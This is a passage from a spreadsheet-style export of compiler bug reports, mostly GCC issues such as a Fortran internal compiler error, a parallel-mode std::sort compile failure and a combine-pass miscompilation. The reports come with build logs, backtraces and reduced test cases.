nsSpecialSystemDirectory.cpp:(.text+0x448): undefined reference to `nsHashtable::Get(nsHashKey*)'
nsSpecialSystemDirectory.cpp:(.text+0x474): undefined reference to `nsHashtable::Get(nsHashKey*)'
nsSpecialSystemDirectory.cpp:(.text+0x4c0): undefined reference to `nsHashtable::Get(nsHashKey*)'
nsSpecialSystemDirectory.cpp:(.text+0x52c): undefined reference to `nsHashKey::~nsHashKey()'
nsSpecialSystemDirectory.cpp:(.text+0x538): undefined reference to `nsHashKey::~nsHashKey()'
nsSpecialSystemDirectory.o: In function `SystemDirectoriesKey::~SystemDirectoriesKey()':
nsSpecialSystemDirectory.cpp:(.text._ZN20SystemDirectoriesKeyD0Ev[SystemDirectoriesKey::~SystemDirectoriesKey()]+0x34): undefined reference to `nsHashKey::~nsHashKey()'
nsSpecialSystemDirectory.o: In function `SystemDirectoriesKey::~SystemDirectoriesKey()':
nsSpecialSystemDirectory.cpp:(.text._ZN20SystemDirectoriesKeyD1Ev[SystemDirectoriesKey::~SystemDirectoriesKey()]+0x2c): undefined reference to `nsHashKey::~nsHashKey()'
collect2: ld returned 1 exit status
make[2]: *** [libxpcom_compat.so] Error 1
make[2]: Leaving directory `/usr/src/seamonkey-build/xpcom/obsolete'
make[1]: *** [tier_2] Error 2
make[1]: Leaving directory `/usr/src/seamonkey-build'
make: *** [default] Error 2</t>
  </si>
  <si>
    <t>giffordj</t>
  </si>
  <si>
    <t>GCC-78499</t>
  </si>
  <si>
    <t>[OOP] ICE in gfc_typename at fortran/misc.c:158</t>
  </si>
  <si>
    <t>With invalid code down to at least 4.8 :
(configured with --enable-checking=yes)
$ cat z1.f90
program p
   type t
   end type
   class(t) :: x = 0
end
$ gfortran-7-20161120 z1.f90
z1.f90:4:16:
    class(t) :: x = 0
                1
Error: CLASS variable 'x' at (1) must be dummy allocatable or pointer
f951: internal compiler error: Segmentation fault
0xc4265f crash_signal
        ../../gcc/toplev.c:333
0x6c239b gfc_typename(gfc_typespec*)
        ../../gcc/fortran/misc.c:158
0x6aa429 gfc_convert_type_warn(gfc_expr* gfc_typespec* int int)
        ../../gcc/fortran/intrinsic.c:5020
0x695b49 gfc_check_assign_symbol(gfc_symbol* gfc_component* gfc_expr*)
        ../../gcc/fortran/expr.c:3878
0x71612b do_traverse_symtree
        ../../gcc/fortran/symbol.c:3994
0x6ff279 resolve_types
        ../../gcc/fortran/resolve.c:15963
0x6fac7c gfc_resolve(gfc_namespace*)
        ../../gcc/fortran/resolve.c:16058
0x6e520a resolve_all_program_units
        ../../gcc/fortran/parse.c:5977
0x6e520a gfc_parse_file()
        ../../gcc/fortran/parse.c:6224
0x729052 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:202</t>
  </si>
  <si>
    <t>GCC-7665</t>
  </si>
  <si>
    <t>gcc crash</t>
  </si>
  <si>
    <t>Crash of gcc on the following input:
static int f (int x) { return x }
static int (*a)[](int) = { 
Release:
2.96
Environment:
Redhat Linux 7.0
How-To-Repeat:
Just run gcc on the example above</t>
  </si>
  <si>
    <t>a.augusteijn1</t>
  </si>
  <si>
    <t>GCC-35588</t>
  </si>
  <si>
    <t>[parallel mode] parallel std::sort and bind()</t>
  </si>
  <si>
    <t>The following code fails to compile using the parallel mode:
#include 
#include 
#include 
int main()
{
        using namespace std
        using namespace tr1
        using namespace placeholders
        int t[10]
        sort(t t+10 bind(less() _1 _2))
}
--------------------------
The error message is:
In file included from /Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:46
                 from /Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/sort.h:50
                 from /Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/algo.h:51
                 from /Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/algorithm:43
                 from /Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/algorithm:70
                 from parallel_sort_bug.cpp:1:
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h: In function 'bool __gnu_parallel::operator&amp; __gnu_parallel::unguarded_iterator&amp;) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]':
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:431:   instantiated from 'RandomAccessIterator3 __gnu_parallel::multiway_merge_3_variant(RandomAccessIteratorIterator RandomAccessIteratorIterator RandomAccessIterator3 Comparator _DifferenceTp bool) [with iterator = __gnu_parallel::unguarded_iterator RandomAccessIteratorIterator = __gnu_cxx::__normal_iterator* std::__cxx1998::vector std::allocator &gt; &gt; &gt; RandomAccessIterator3 = int* _DifferenceTp = int Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:1395:   instantiated from 'RandomAccessIterator3 __gnu_parallel::multiway_merge(RandomAccessIteratorIterator RandomAccessIteratorIterator RandomAccessIterator3 Comparator _DifferenceTp bool bool __gnu_parallel::sequential_tag) [with RandomAccessIteratorIterator = __gnu_cxx::__normal_iterator* std::__cxx1998::vector std::allocator &gt; &gt; &gt; RandomAccessIterator3 = int* _DifferenceTp = int Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:311:   instantiated from 'void __gnu_parallel::parallel_sort_mwms_pu(__gnu_parallel::PMWMSSortingData* Comparator&amp;) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:407:   instantiated from 'void __gnu_parallel::parallel_sort_mwms(RandomAccessIterator RandomAccessIterator Comparator typename std::iterator_traits::difference_type int bool) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/sort.h:88:   instantiated from 'void __gnu_parallel::parallel_sort(RandomAccessIterator RandomAccessIterator Comparator bool) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/algo.h:1751:   instantiated from 'void std::__parallel::sort(_RAIter _RAIter _Compare) [with _RAIter = int* _Compare = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
parallel_sort_bug.cpp:12:   instantiated from here
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:256: error: no match for call to '(std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;) (int int)'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1189: note: candidates are: typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1200: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) const [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1212: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) volatile [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1225: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) const volatile [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h: In function 'bool __gnu_parallel::operator&amp; __gnu_parallel::unguarded_iterator&amp;) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]':
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:436:   instantiated from 'RandomAccessIterator3 __gnu_parallel::multiway_merge_3_variant(RandomAccessIteratorIterator RandomAccessIteratorIterator RandomAccessIterator3 Comparator _DifferenceTp bool) [with iterator = __gnu_parallel::unguarded_iterator RandomAccessIteratorIterator = __gnu_cxx::__normal_iterator* std::__cxx1998::vector std::allocator &gt; &gt; &gt; RandomAccessIterator3 = int* _DifferenceTp = int Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:1395:   instantiated from 'RandomAccessIterator3 __gnu_parallel::multiway_merge(RandomAccessIteratorIterator RandomAccessIteratorIterator RandomAccessIterator3 Comparator _DifferenceTp bool bool __gnu_parallel::sequential_tag) [with RandomAccessIteratorIterator = __gnu_cxx::__normal_iterator* std::__cxx1998::vector std::allocator &gt; &gt; &gt; RandomAccessIterator3 = int* _DifferenceTp = int Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:311:   instantiated from 'void __gnu_parallel::parallel_sort_mwms_pu(__gnu_parallel::PMWMSSortingData* Comparator&amp;) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:407:   instantiated from 'void __gnu_parallel::parallel_sort_mwms(RandomAccessIterator RandomAccessIterator Comparator typename std::iterator_traits::difference_type int bool) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/sort.h:88:   instantiated from 'void __gnu_parallel::parallel_sort(RandomAccessIterator RandomAccessIterator Comparator bool) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/algo.h:1751:   instantiated from 'void std::__parallel::sort(_RAIter _RAIter _Compare) [with _RAIter = int* _Compare = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
parallel_sort_bug.cpp:12:   instantiated from here
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:243: error: no match for call to '(std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;) (int int)'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1189: note: candidates are: typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1200: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) const [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1212: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) volatile [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1225: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) const volatile [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h: In function 'bool __gnu_parallel::operator&amp; __gnu_parallel::guarded_iterator&amp;) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]':
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:431:   instantiated from 'RandomAccessIterator3 __gnu_parallel::multiway_merge_3_variant(RandomAccessIteratorIterator RandomAccessIteratorIterator RandomAccessIterator3 Comparator _DifferenceTp bool) [with iterator = __gnu_parallel::guarded_iterator RandomAccessIteratorIterator = __gnu_cxx::__normal_iterator* std::__cxx1998::vector std::allocator &gt; &gt; &gt; RandomAccessIterator3 = int* _DifferenceTp = int Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:1403:   instantiated from 'RandomAccessIterator3 __gnu_parallel::multiway_merge(RandomAccessIteratorIterator RandomAccessIteratorIterator RandomAccessIterator3 Comparator _DifferenceTp bool bool __gnu_parallel::sequential_tag) [with RandomAccessIteratorIterator = __gnu_cxx::__normal_iterator* std::__cxx1998::vector std::allocator &gt; &gt; &gt; RandomAccessIterator3 = int* _DifferenceTp = int Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:311:   instantiated from 'void __gnu_parallel::parallel_sort_mwms_pu(__gnu_parallel::PMWMSSortingData* Comparator&amp;) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:407:   instantiated from 'void __gnu_parallel::parallel_sort_mwms(RandomAccessIterator RandomAccessIterator Comparator typename std::iterator_traits::difference_type int bool) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/sort.h:88:   instantiated from 'void __gnu_parallel::parallel_sort(RandomAccessIterator RandomAccessIterator Comparator bool) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/algo.h:1751:   instantiated from 'void std::__parallel::sort(_RAIter _RAIter _Compare) [with _RAIter = int* _Compare = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
parallel_sort_bug.cpp:12:   instantiated from here
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:167: error: no match for call to '(std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;) (int int)'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1189: note: candidates are: typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1200: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) const [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1212: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) volatile [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1225: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) const volatile [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h: In function 'bool __gnu_parallel::operator&amp; __gnu_parallel::guarded_iterator&amp;) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]':
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:436:   instantiated from 'RandomAccessIterator3 __gnu_parallel::multiway_merge_3_variant(RandomAccessIteratorIterator RandomAccessIteratorIterator RandomAccessIterator3 Comparator _DifferenceTp bool) [with iterator = __gnu_parallel::guarded_iterator RandomAccessIteratorIterator = __gnu_cxx::__normal_iterator* std::__cxx1998::vector std::allocator &gt; &gt; &gt; RandomAccessIterator3 = int* _DifferenceTp = int Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:1403:   instantiated from 'RandomAccessIterator3 __gnu_parallel::multiway_merge(RandomAccessIteratorIterator RandomAccessIteratorIterator RandomAccessIterator3 Comparator _DifferenceTp bool bool __gnu_parallel::sequential_tag) [with RandomAccessIteratorIterator = __gnu_cxx::__normal_iterator* std::__cxx1998::vector std::allocator &gt; &gt; &gt; RandomAccessIterator3 = int* _DifferenceTp = int Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:311:   instantiated from 'void __gnu_parallel::parallel_sort_mwms_pu(__gnu_parallel::PMWMSSortingData* Comparator&amp;) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_mergesort.h:407:   instantiated from 'void __gnu_parallel::parallel_sort_mwms(RandomAccessIterator RandomAccessIterator Comparator typename std::iterator_traits::difference_type int bool) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/sort.h:88:   instantiated from 'void __gnu_parallel::parallel_sort(RandomAccessIterator RandomAccessIterator Comparator bool) [with RandomAccessIterator = int* Comparator = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/algo.h:1751:   instantiated from 'void std::__parallel::sort(_RAIter _RAIter _Compare) [with _RAIter = int* _Compare = std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;]'
parallel_sort_bug.cpp:12:   instantiated from here
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/parallel/multiway_merge.h:151: error: no match for call to '(std::tr1::_Bind ()(std::tr1::_Placeholder std::tr1::_Placeholder)&gt;) (int int)'
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1189: note: candidates are: typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1200: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) const [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1212: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) volatile [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]
/Users/spion/GCC/Darwin/lib/gcc/i386-apple-darwin8.11.1/4.4.0/../../../../include/c++/4.4.0/tr1_impl/functional:1225: note:                 typename std::tr1::result_of 0)&gt; ()(_Bound_args std::tr1::tuple)&gt;::type ...)&gt;::type std::tr1::_Bind::operator()(_Args&amp; ...) const volatile [with _Args = int int _Functor = std::less _Bound_args = std::tr1::_Placeholder std::tr1::_Placeholder]</t>
  </si>
  <si>
    <t>GCC-79910</t>
  </si>
  <si>
    <t>[7 Regression] wrong code with -O -fweb</t>
  </si>
  <si>
    <t>Created attachment 40892
reduced testcase
Output:
$ x86_64-pc-linux-gnu-gcc -O -fweb testcase.c
$ ./a.out 
Aborted
$ x86_64-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-amd64/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-245841-checking-yes-rtl-df-extra-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-245841-checking-yes-rtl-df-extra-nographite-amd64
Thread model: posix
gcc version 7.0.1 20170302 (experimental) (GCC) 
There seems to be a problem in the combine pass.
Before .combine there is:
...
(insn 16 14 17 2 (parallel [
            (set (reg/v:DI 100 [ bD.1802 ])
                (lshiftrt:DI (reg:DI 107)
                    (reg:QI 110)))
            (clobber (reg:CC 17 flags))
        ]) testcase.c:11 544 {*lshrdi3_1}
     (expr_list:REG_DEAD (reg:QI 110)
        (expr_list:REG_DEAD (reg:DI 107)
            (expr_list:REG_UNUSED (reg:CC 17 flags)
                (nil)))))
...
(insn 28 27 30 2 (parallel [
            (set (reg:DI 128 [ _6 ])
                (minus:DI (reg:DI 111 [ p1D.1798 ])
                    (reg:DI 119)))
            (clobber (reg:CC 17 flags))
        ]) testcase.c:12 272 {*subdi_1}
     (expr_list:REG_DEAD (reg:DI 119)
        (expr_list:REG_DEAD (reg:DI 111 [ p1D.1798 ])
            (expr_list:REG_UNUSED (reg:CC 17 flags)
                (nil)))))
(insn 30 28 31 2 (parallel [
            (set (reg:SI 120)
                (and:SI (subreg:SI (reg/v:DI 100 [ bD.1802 ]) 0)
                    (const_int 31 [0x1f])))
            (clobber (reg:CC 17 flags))
        ]) testcase.c:13 389 {*andsi_1}
     (expr_list:REG_UNUSED (reg:CC 17 flags)
        (nil)))
(insn 31 30 32 2 (set (reg:SI 121)
        (const_int 4 [0x4])) testcase.c:13 82 {*movsi_internal}
     (nil))
(insn 32 31 33 2 (parallel [
            (set (reg/v:SI 106 [ p2D.1799 ])
                (lshiftrt:SI (reg:SI 121)
                    (subreg:QI (reg:SI 120) 0)))
            (clobber (reg:CC 17 flags))
        ]) testcase.c:13 542 {*lshrsi3_1}
     (expr_list:REG_DEAD (reg:SI 121)
        (expr_list:REG_DEAD (reg:SI 120)
            (expr_list:REG_UNUSED (reg:CC 17 flags)
                (expr_list:REG_EQUAL (lshiftrt:SI (const_int 4 [0x4])
                        (subreg:QI (reg:SI 120) 0))
                    (nil))))))
...
But .combine shows:
...
Trying 27 28 -&gt; 33:
...
Successfully matched this instruction:
(set (reg:QI 128 [ _6 ])
    (plus:QI (subreg:QI (reg:DI 111 [ p1D.1798 ]) 0)
        (subreg:QI (reg/v:DI 100 [ bD.1802 ]) 0)))
Successfully matched this instruction:
(set (reg:QI 123 [ p1D.1798 ])
    (plus:QI (reg:QI 128 [ _6 ])
        (subreg:QI (reg:DI 92 [ _6 ]) 0)))
allowing combination of insns 27 28 and 33
...
Trying 16 32 -&gt; 35:
...
Successfully matched this instruction:
(set (reg/v:DI 100 [ bD.1802 ])
    (lshiftrt:DI (reg:DI 107)
        (reg:QI 110)))
Successfully matched this instruction:
(set (reg:SI 125 [ p2D.1799 ])
    (const_int 0 [0]))
allowing combination of insns 16 32 and 35
...
So after .combine there is:
...
(insn 28 27 30 2 (parallel [
            (set (reg:QI 128 [ _6 ])
                (plus:QI (subreg:QI (reg:DI 111 [ p1D.1798 ]) 0)
                    (subreg:QI (reg/v:DI 100 [ bD.1802 ]) 0)))
            (clobber (reg:CC 17 flags))
        ]) testcase.c:12 219 {*addqi_1}
     (expr_list:REG_UNUSED (reg:CC 17 flags)
        (expr_list:REG_DEAD (reg:DI 111 [ p1D.1798 ])
            (nil))))
(note 30 28 31 2 NOTE_INSN_DELETED)
(note 31 30 32 2 NOTE_INSN_DELETED)
(insn 32 31 33 2 (parallel [
            (set (reg/v:DI 100 [ bD.1802 ])
                (lshiftrt:DI (reg:DI 107)
                    (reg:QI 110)))
            (clobber (reg:CC 17 flags))
        ]) testcase.c:13 544 {*lshrdi3_1}
     (expr_list:REG_UNUSED (reg:CC 17 flags)
        (expr_list:REG_DEAD (reg:DI 107)
            (expr_list:REG_DEAD (reg:QI 110)
                (nil)))))
...
--&gt; reg 100 is used in insn 28 before it is set in insn 32.</t>
  </si>
  <si>
    <t>GCC-10209</t>
  </si>
  <si>
    <t>17-March-2003 3.3 snapshot fails to boot ibuilding libstdc++</t>
  </si>
  <si>
    <t>I tried bootstrapping the March 17 2003 snapshot on aix5.2l and got link failures building the c++ libraries.
Here are the configure arguments:
